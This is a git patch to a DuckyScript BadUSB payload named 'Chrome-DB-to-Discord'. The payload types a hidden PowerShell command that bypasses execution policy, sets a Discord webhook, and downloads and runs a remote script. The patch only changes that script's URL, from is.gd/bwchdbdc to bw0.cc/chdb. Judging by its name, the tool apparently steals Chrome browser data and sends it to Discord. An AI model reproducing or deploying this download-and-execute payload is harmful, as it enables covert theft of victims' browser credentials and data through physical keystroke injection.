From 1dfb471b4c185ce8566a209553ceef9dc0e2689b Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Tue, 17 Jun 2025 10:16:09 +0000 Subject: [PATCH] Update Chrome-DB-to-Discord.txt --- Chrome-DB-to-Discord/Chrome-DB-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Chrome-DB-to-Discord/Chrome-DB-to-Discord.txt b/Chrome-DB-to-Discord/Chrome-DB-to-Discord.txt index c9d361d..a7bf2ef 100644 --- a/Chrome-DB-to-Discord/Chrome-DB-to-Discord.txt +++ b/Chrome-DB-to-Discord/Chrome-DB-to-Discord.txt @@ -13,7 +13,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwchdbdc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm https://bw0.cc/chdb | iex ENTER